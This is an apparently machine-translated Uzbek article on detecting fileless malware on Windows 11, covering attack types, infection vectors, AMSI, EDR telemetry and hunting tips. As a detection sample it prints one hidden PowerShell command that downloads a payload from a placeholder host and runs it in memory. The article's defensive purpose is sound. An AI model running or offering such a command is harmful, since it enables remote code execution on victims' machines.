Windows 11 da xavfli faylsiz zararli dasturlarni qanday aniqlash mumkin

¿Xavfli faylsiz zararli dasturlarni qanday aniqlash mumkin? Faylsiz hujumlar faolligi sezilarli darajada oshdi va vaziyatni yomonlashtirish uchun, Windows 11 immunitetga ega emasUshbu yondashuv diskni chetlab o'tadi va xotira va qonuniy tizim vositalariga tayanadi; shuning uchun imzoga asoslangan antivirus dasturlari kurashadi. Agar siz uni aniqlashning ishonchli usulini izlayotgan bo'lsangiz, javob birlashtirishda bo'ladi telemetriya, xatti-harakatlar tahlili va Windows boshqaruvlari.

Joriy ekotizimda PowerShell, WMI yoki Mshta-dan suiiste'mol qiladigan kampaniyalar xotira in'ektsiyalari, diskka "tegmasdan" qat'iylik va hattoki kabi murakkabroq usullar bilan birga mavjud. mikrodasturni suiiste'mol qilishAsosiysi, tahdidlar xaritasini, hujum bosqichlarini va hamma narsa RAM ichida sodir bo'lganda ham ular qanday signallarni qoldirishini tushunishdir.

Faylsiz zararli dastur nima va bu Windows 11 da nima uchun tashvish uyg'otadi?

"Faylsiz" tahdidlar haqida gapirganda, biz zararli kodni nazarda tutamiz Yangi bajariladigan fayllarni saqlashingiz shart emas fayl tizimida ishlash uchun. U odatda ishlaydigan jarayonlarga kiritiladi va Microsoft tomonidan imzolangan tarjimonlar va ikkilik fayllarga tayangan holda RAMda bajariladi (masalan, PowerShell, WMI, rundll32, mshtaBu sizning izingizni kamaytiradi va faqat shubhali fayllarni qidiradigan dvigatellarni chetlab o'tishga imkon beradi.

Hatto buyruqlarni ishga tushirish uchun zaifliklardan foydalanadigan ofis hujjatlari yoki PDF-fayllar ham bu hodisaning bir qismi hisoblanadi, chunki xotirada bajarilishini faollashtirish tahlil qilish uchun foydali ikkiliklarni qoldirmasdan. Suiiste'mol qilish makroslar va DDE Office-da, chunki kod WinWord kabi qonuniy jarayonlarda ishlaydi.

Hujumchilar ijtimoiy muhandislikni (fishing, spam havolalari) texnik tuzoqlar bilan birlashtiradi: foydalanuvchining bosishi skriptni yuklab oladigan va xotiradagi yakuniy yukni bajaradigan zanjirni boshlaydi, iz qoldirmaslik diskda. Maqsadlar ma'lumotlarni o'g'irlashdan tortib to ransomware ijrosigacha, jim lateral harakatga qadar.

Tizimdagi iz bo'yicha tipologiyalar: "sof" dan duragaylargacha

Tushunchalarni chalkashtirib yubormaslik uchun tahdidlarni fayl tizimi bilan oʻzaro taʼsir qilish darajasi boʻyicha ajratish foydali boʻladi. Ushbu toifalash aniqlik kiritadi nima davom etmoqda, kod qaerda yashaydi va u qanday belgilar qoldiradi?.

Tur I: fayl faoliyati yo'q

To'liq faylsiz zararli dastur diskka hech narsa yozmaydi. Klassik misol - a dan foydalanish tarmoq zaifligi yadro xotirasida joylashgan orqa eshikni (DoublePulsar kabi holatlar) amalga oshirish uchun (kundagi EternalBlue vektori kabi). Bu erda hamma narsa RAMda sodir bo'ladi va fayl tizimida hech qanday artefakt yo'q.

Yana bir variant - ifloslanishdir proshivka komponentlar: BIOS/UEFI, tarmoq adapterlari, USB atrof-muhit birliklari (BadUSB tipidagi texnikalar) yoki hatto CPU quyi tizimlari. Ular qayta ishga tushirish va qayta o'rnatish orqali davom etadi, bu qo'shimcha qiyinchilik bilan Mikrodasturlarni bir nechta mahsulotlar tekshiradiBu murakkab hujumlar, kamroq tez-tez, lekin yashirinligi va chidamliligi tufayli xavfli.

II tur: bilvosita arxivlash faoliyati

Bu erda zararli dastur o'zining bajariladigan faylini "tark etmaydi", lekin asosan fayllar sifatida saqlanadigan tizim tomonidan boshqariladigan konteynerlardan foydalanadi. Misol uchun, o'simlikning orqa eshiklari powershell buyruqlari WMI omborida saqlang va hodisa filtrlari bilan uning bajarilishini ishga tushiring. Ikkilik fayllarni tashlamasdan uni buyruq satridan o'rnatish mumkin, lekin WMI ombori diskda qonuniy ma'lumotlar bazasi sifatida joylashgan bo'lib, tizimga ta'sir qilmasdan tozalashni qiyinlashtiradi.

Amaliy nuqtai nazardan, ular faylsiz hisoblanadi, chunki bu konteyner (WMI, Registry va boshqalar). Bu klassik aniqlanadigan bajariladigan fayl emas Va uning tozalanishi ahamiyatsiz emas. Natija: ozgina "an'anaviy" iz bilan yashirin qat'iylik.

III tur: ishlashi uchun fayllarni talab qiladi

Ba'zi hollarda a "faylsiz" qat'iylik Mantiqiy darajada ular faylga asoslangan triggerga muhtoj. Oddiy misol Kovter: u tasodifiy kengaytma uchun qobiqli fe'lni qayd qiladi; ushbu kengaytmali fayl ochilganda, mshta.exe-dan foydalangan holda kichik skript ishga tushiriladi, bu zararli satrni reestrdan qayta tiklaydi.

Ayyorlik shundaki, tasodifiy kengaytmali bu "o'lja" fayllar tahlil qilinadigan foydali yukni o'z ichiga olmaydi va kodning asosiy qismi ushbu faylda joylashgan. ro'yxatga olish (boshqa idish). Shuning uchun ular bir yoki bir nechta disk artefaktlariga trigger sifatida bog'liq bo'lsa ham, ular ta'sir qilishda faylsiz deb tasniflanadi.

INFEKTSION vektorlari va "xostlari": u qayerga kiradi va qayerda yashirinadi

Aniqlashni yaxshilash uchun infektsiyaning kirish nuqtasi va xostini xaritalash juda muhimdir. Ushbu nuqtai nazar dizaynga yordam beradi maxsus boshqaruv elementlari Tegishli telemetriyaga ustunlik bering.

qilmishlari

• Faylga asoslangan (III-toifa): Hujjatlar, bajariladigan fayllar, eski Flash/Java fayllari yoki LNK fayllari xotiraga qobiq kodini yuklash uchun brauzer yoki ularni qayta ishlaydigan vositadan foydalanishi mumkin. Birinchi vektor fayldir, lekin foydali yuk RAMga o'tadi.
• Tarmoqqa asoslangan (I-toifa): Zaiflikdan foydalanadigan paket (masalan, SMB-da) foydalanuvchi maydonida yoki yadroda bajarilishiga erishadi. WannaCry ushbu yondashuvni ommalashtirdi. To'g'ridan-to'g'ri xotira yuki yangi faylsiz.

Uskuna

• Asboblar (I-toifa): Disk yoki tarmoq kartasi proshivkasini o'zgartirish va kodni kiritish mumkin. Tekshirish qiyin va operatsion tizimdan tashqarida saqlanib qoladi.
• CPU va boshqaruv quyi tizimlari (I-toifa): Intelning ME/AMT kabi texnologiyalari Tarmoqqa ulanish va operatsion tizimdan tashqarida bajarishU juda past darajada, yuqori potentsial yashirinlik bilan hujum qiladi.
• USB (I-toifa): BadUSB sizga klaviatura yoki NIC taqlid qilish va buyruqlarni ishga tushirish yoki trafikni qayta yo'naltirish uchun USB diskini qayta dasturlash imkonini beradi.
• BIOS / UEFI (I-toifa): Windows-ni ishga tushirishdan oldin ishlaydigan zararli dasturiy ta'minotni qayta dasturlash (Mebromi kabi holatlar).
• Gipervisor (I-toifa): OS ostida uning mavjudligini yashirish uchun mini-gipervizorni o'rnatish. Kamdan-kam, lekin allaqachon gipervisor rootkitlari shaklida kuzatilgan.

Amalga oshirish va in'ektsiya

• Faylga asoslangan (III-toifa): EXE/DLL/LNK yoki qonuniy jarayonlarga inyeksiyalarni ishga tushiradigan rejalashtirilgan vazifalar.
• macros (III-toifa): Office in VBA aldash orqali foydalanuvchining roziligi bilan foydali yuklarni, shu jumladan to'liq to'lov dasturini dekodlashi va amalga oshirishi mumkin.
• Skriptlar (II tur): PowerShell, VBScript yoki fayldan JScript, buyruq qatori, xizmatlar, Ro'yxatdan o'tish yoki WMITajovuzkor skriptni diskka tegmasdan masofaviy seansda yozishi mumkin.
• Yuklash yozuvi (MBR/Boot) (II-toifa): Petya kabi oilalar ishga tushirish vaqtida nazoratni o'z qo'liga olish uchun yuklash sektorini qayta yozadilar. U fayl tizimidan tashqarida, lekin uni qayta tiklashi mumkin bo'lgan OS va zamonaviy echimlar uchun ochiq.

Faylsiz hujumlar qanday ishlaydi: bosqichlar va signallar

Ular bajariladigan fayllarni qoldirmasa ham, kampaniyalar bosqichma-bosqich mantiqqa amal qiladi. Ularni tushunish monitoring qilish imkonini beradi. hodisalar va jarayonlar o'rtasidagi munosabatlar bu iz qoldiradi.

• Dastlabki kirishHavolalar yoki qo'shimchalar, buzilgan veb-saytlar yoki o'g'irlangan hisob ma'lumotlari yordamida fishing hujumlari. Ko'pgina zanjirlar buyruqni ishga tushiradigan Office hujjati bilan boshlanadi PowerShell.
• Qat'iylik: WMI orqali orqa eshiklar (filtrlar va obunalar), Ro'yxatga olish kitobi ijro kalitlari yoki yangi zararli faylsiz skriptlarni qayta ishga tushiradigan rejalashtirilgan vazifalar.
• EksfiltratsiyaMa'lumot yig'ilgandan so'ng, trafikni aralashtirish uchun ishonchli jarayonlar (brauzerlar, PowerShell, bitsadmin) yordamida tarmoqdan yuboriladi.

Bu naqsh, ayniqsa, hiyla-nayrang, chunki hujum ko'rsatkichlari Ular oddiylikda yashirinadi: buyruq qatori argumentlari, jarayon zanjiri, anomaliya chiquvchi ulanishlar yoki in'ektsiya API-lariga kirish.

Umumiy texnikalar: xotiradan yozib olishgacha

Aktyorlar bir qatorga tayanadilar usullari yashirinlikni optimallashtiradi. Samarali aniqlashni faollashtirish uchun eng keng tarqalganlarini bilish foydali bo'ladi.

• Xotirada rezident: Faollashtirishni kutayotgan ishonchli jarayon maydoniga foydali yuklarni yuklash. rootkitlar va ilgaklar Yadroda ular yashirish darajasini oshiradilar.
• Ro'yxatga olish kitobida doimiylikShifrlangan bloblarni kalitlarga saqlang va ularni qonuniy ishga tushirgichdan (mshta, rundll32, wscript) qayta namlang. Efemer o'rnatuvchi o'z izini minimallashtirish uchun o'zini o'zi yo'q qilishi mumkin.
• Hisob ma'lumotlari fishingO'g'irlangan foydalanuvchi nomlari va parollaridan foydalanib, tajovuzkor uzoqdan qobiq va o'simliklarni amalga oshiradi jim kirish Registry yoki WMI da.
• "Faylsiz" to'lov dasturiShifrlash va C2 ​​aloqasi RAMdan tashkil etilgan bo'lib, zarar ko'rinmaguncha aniqlash imkoniyatlarini kamaytiradi.
• Operatsion to'plamlar: zaifliklarni aniqlaydigan va foydalanuvchi bosgandan keyin faqat xotira uchun foydali yuklarni o'rnatadigan avtomatlashtirilgan zanjirlar.
• Kod bilan hujjatlar: bajariladigan fayllarni diskda saqlamasdan buyruqlarni ishga tushiradigan DDE kabi makroslar va mexanizmlar.

Sanoat tadqiqotlari allaqachon sezilarli cho'qqilarni ko'rsatdi: 2018 yilning bir davrida, a 90% dan ortiq o'sish skriptga asoslangan va PowerShell zanjirli hujumlarida vektor samaradorligi uchun afzal ko'rilganligining belgisi.

Kompaniyalar va etkazib beruvchilar uchun qiyinchilik: nima uchun blokirovka qilish etarli emas

PowerShell-ni o'chirib qo'yish yoki makroslarni abadiy taqiqlash jozibador bo'lardi, lekin Siz operatsiyani buzasizPowerShell zamonaviy boshqaruvning ustunidir va Office biznesda muhim ahamiyatga ega; ko'r-ko'rona blokirovka qilish ko'pincha amalga oshirilmaydi.

Bundan tashqari, asosiy boshqaruv elementlarini chetlab o'tish usullari mavjud: PowerShell-ni DLL va rundll32 orqali ishga tushirish, skriptlarni EXE-ga o'rash, O'zingizning PowerShell nusxangizni olib keling yoki hatto tasvirlardagi skriptlarni yashirish va ularni xotiraga chiqarish. Shuning uchun mudofaa faqat asboblar mavjudligini inkor etishga asoslanishi mumkin emas.

Yana bir keng tarqalgan xato - bu butun qarorni bulutga topshirish: agar agent serverdan javob kutishi kerak bo'lsa, Siz real vaqtda oldini olishni yo'qotasizAxborotni boyitish uchun telemetriya ma'lumotlarini yuklash mumkin, ammo Yumshatish oxirgi nuqtada amalga oshirilishi kerak.

Windows 11 da faylsiz zararli dasturlarni qanday aniqlash mumkin: telemetriya va xatti-harakatlar

G'alaba strategiyasi jarayonlar va xotirani kuzatishFayllar emas. Zararli xatti-harakatlar fayl shakllaridan ko'ra barqarorroq bo'lib, ularni oldini olish mexanizmlari uchun ideal qiladi.

• AMSI (antimalware skanerlash interfeysi)U PowerShell, VBScript yoki JScript skriptlarini hatto dinamik ravishda xotirada tuzilgan bo'lsa ham ushlab turadi. Amalga oshirishdan oldin noaniq satrlarni olish uchun juda yaxshi.
• Jarayon monitoringi: boshlash/tugatish, PID, ota-onalar va bolalar, marshrutlar, buyruq qatorlari va xeshlar, shuningdek, to'liq hikoyani tushunish uchun ijro daraxtlari.
• Xotira tahlili: in'ektsiyalarni, aks ettiruvchi yoki PE yuklarini diskka tegmasdan aniqlash va noodatiy bajariladigan hududlarni ko'rib chiqish.
• Boshlang'ich sektorni himoya qilish: buzilgan taqdirda MBR/EFI ni nazorat qilish va tiklash.

Microsoft ekotizimida Defender for Endpoint AMSI-ni birlashtiradi, xatti-harakatlar monitoringiXotirani skanerlash va bulutga asoslangan mashinani o'rganish yangi yoki noaniq variantlarga nisbatan aniqlashni kengaytirish uchun ishlatiladi. Boshqa sotuvchilar yadro rezidenti dvigatellari bilan o'xshash yondashuvlardan foydalanadilar.

Korrelyatsiyaning haqiqiy misoli: hujjatdan PowerShellgacha

Outlook ilovani yuklab oladigan, Word hujjatni ochadigan, faol tarkib yoqilgan va PowerShell shubhali parametrlar bilan ishga tushirilgan zanjirni tasavvur qiling. Tegishli telemetriya buni ko'rsatadi Buyruq satri (masalan, ExecutionPolicy Bypass, yashirin oyna), ishonchsiz domenga ulanish va AppData-da o'zini o'rnatadigan bola jarayonini yaratish.

Mahalliy kontekstga ega agent bunga qodir to'xtatish va orqaga qaytarish SIEM yoki elektron pochta/SMS orqali xabardor qilishdan tashqari, qo'lda aralashuvisiz zararli faoliyat. Ba'zi mahsulotlar ko'rinadigan jarayonga (Outlook/Word) emas, balki asosiy sabab atribut qatlamini (StoryLine tipidagi modellar) qo'shadi. to'liq zararli mavzu va tizimni har tomonlama tozalash uchun uning kelib chiqishi.

E'tibor berish kerak bo'lgan odatiy buyruq namunasi quyidagicha ko'rinishi mumkin: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Mantiq aniq satr emas, lekin signallar to'plami: siyosatni aylanib o'tish, yashirin oyna, aniq yuklab olish va xotirada bajarish.

AMSI, quvur liniyasi va har bir aktyorning roli: so'nggi nuqtadan SOCgacha

Skriptni yozib olishdan tashqari, kuchli arxitektura tergov va javob berishni osonlashtiradigan qadamlarni tartibga soladi. Yukni bajarishdan oldin qancha ko'p dalil bo'lsa, shuncha yaxshi bo'ladi., eng yaxshi.

• Skriptni ushlab turishAMSI zararli dasturlarda statik va dinamik tahlil qilish uchun kontentni (hatto u tezda yaratilgan bo'lsa ham) yetkazib beradi.
• Jarayon hodisalariPIDlar, binarlar, xeshlar, marshrutlar va boshqa ma'lumotlar yig'iladi. dalillar, yakuniy yukga olib kelgan texnologik daraxtlarni o'rnatish.
• Aniqlash va hisobot berishAniqlanishlar mahsulot konsolida ko'rsatiladi va kampaniyani vizualizatsiya qilish uchun tarmoq platformalariga (NDR) yo'naltiriladi.
• Foydalanuvchi kafolatlariSkript xotiraga kiritilgan bo'lsa ham, ramka AMSI uni ushlab turadi Windowsning mos versiyalarida.
• Administrator imkoniyatlari: skriptni tekshirishni yoqish uchun siyosat konfiguratsiyasi, xatti-harakatlarga asoslangan blokirovka va konsoldan hisobotlar yaratish.
• SOC ishi: tarixni qayta yaratish uchun artefaktlarni chiqarish (VM UUID, OS versiyasi, skript turi, tashabbuskor jarayoni va uning ota-onasi, xeshlar va buyruq satrlari) va ko'tarish qoidalari kelajak.

Platforma eksport qilishga ruxsat berganda xotira buferi Qatl bilan bog'liq holda, tadqiqotchilar yangi aniqlashlarni yaratishi va shunga o'xshash variantlardan himoyani boyitishi mumkin.

Windows 11 da amaliy chora-tadbirlar: oldini olish va ov qilish

Xotirani tekshirish va AMSI bilan EDRga ega bo'lishdan tashqari, Windows 11 hujum maydonlarini yopish va ko'rishni yaxshilash imkonini beradi. mahalliy boshqaruv elementlari.

• PowerShell-da ro'yxatdan o'tish va cheklovlarSkript bloklari jurnali va modul jurnalini yoqadi, iloji bo'lsa, cheklangan rejimlarni qo'llaydi va foydalanishni nazorat qiladi Aylanib o'tish/Yashirin.
• Hujum sirtini qisqartirish (ASR) qoidalari: Office jarayonlari tomonidan skriptni ishga tushirishni bloklaydi va WMI suiiste'moli/PSExec kerak bo'lmaganda.
• Ofis makro siyosati: sukut bo'yicha, ichki makro imzolash va qat'iy ishonch ro'yxatlarini o'chirib qo'yadi; eski DDE oqimlarini kuzatib boradi.
• WMI auditi va reestri: voqea obunalarini va avtomatik bajarish kalitlarini (Run, RunOnce, Winlogon), shuningdek, vazifalarni yaratishni nazorat qiladi rejalashtirilgan.
• Ishga tushirishni himoya qilish: Secure Boot-ni faollashtiradi, MBR/EFI yaxlitligini tekshiradi va ishga tushirishda hech qanday o'zgarishlar yo'qligini tasdiqlaydi.
• Yamoq va qattiqlashish: brauzerlarda, Office komponentlarida va tarmoq xizmatlarida foydalaniladigan zaifliklarni yopadi.
• Ogohlik: foydalanuvchilarni va texnik guruhlarni fishing va signallarga o'rgatadi yashirin qatllar.

Ov qilish uchun quyidagi savollarga e'tibor qarating: Office tomonidan PowerShell/MSHTA bo'yicha jarayonlarni yaratish, bilan argumentlar yuklab olish qatori/yuklab olish fayliShubhali TLD-larga aniq xiralashgan skriptlar, aks ettiruvchi inyeksiyalar va chiquvchi tarmoqlar. Shovqinni kamaytirish uchun ushbu signallarni obro'si va chastotasi bilan o'zaro bog'lang.

Bugungi kunda har bir dvigatel nimani aniqlay oladi?

Microsoft korporativ yechimlari AMSI, xatti-harakatlar tahlili, xotirani tekshirish va yuklash sektorini himoya qilish, shuningdek, paydo bo'ladigan tahdidlarga qarshi miqyoslash uchun bulutga asoslangan ML modellari. Boshqa ishlab chiqaruvchilar o'zgarishlarni avtomatik ravishda qaytarish bilan zararli dasturlarni zararli dasturlardan farqlash uchun yadro darajasidagi monitoringni amalga oshiradilar.

ga asoslangan yondashuv qatl hikoyalari Bu sizga asosiy sababni aniqlash imkonini beradi (masalan, zanjirni ishga tushiradigan Outlook ilovasi) va butun daraxtni yumshatadi: skriptlar, kalitlar, vazifalar va oraliq ikkilik fayllar, ko'rinadigan alomatga yopishib qolmaslik.

Umumiy xatolar va ulardan qanday qochish kerak

PowerShell-ni muqobil boshqaruv rejasisiz bloklash nafaqat amaliy, balki mavjud uni bilvosita chaqirish usullariXuddi shu narsa makroslarga ham tegishli: yo ularni siyosat va imzolar bilan boshqarasiz, yoki biznes zarar ko'radi. Telemetriya va xatti-harakatlar qoidalariga e'tibor qaratish yaxshiroqdir.

Yana bir keng tarqalgan xato - bu ilovalarni oq ro'yxatga olish hamma narsani hal qiladi, deb ishonishdir: faylsiz texnologiya aynan bunga tayanadi. ishonchli ilovalarNazorat faqat ruxsat berilgan yoki yo'qligini emas, balki ular nima qilayotganini va qanday munosabatda bo'lishini kuzatishi kerak.

Yuqorida aytilganlarning barchasi bilan faylsiz zararli dasturiy ta'minot haqiqatan ham muhim bo'lgan narsani kuzatib borganingizda "arvoh" bo'lishni to'xtatadi: xulq-atvor, xotira va kelib chiqishi har bir ijro. AMSI, boy jarayon telemetriyasi, mahalliy Windows 11 boshqaruvlari va EDR qatlamini xatti-harakatlar tahlili bilan birlashtirish sizga afzallik beradi. Tenglamaga makroslar va PowerShell, WMI/Registri auditi va buyruq satrlari va ishlov berish daraxtlarini birinchi o'ringa qo'yadigan ovchilik uchun real siyosatlarni qo'shing va sizda bu zanjirlar tovush chiqarishdan oldin ularni kesib tashlaydigan himoya mavjud.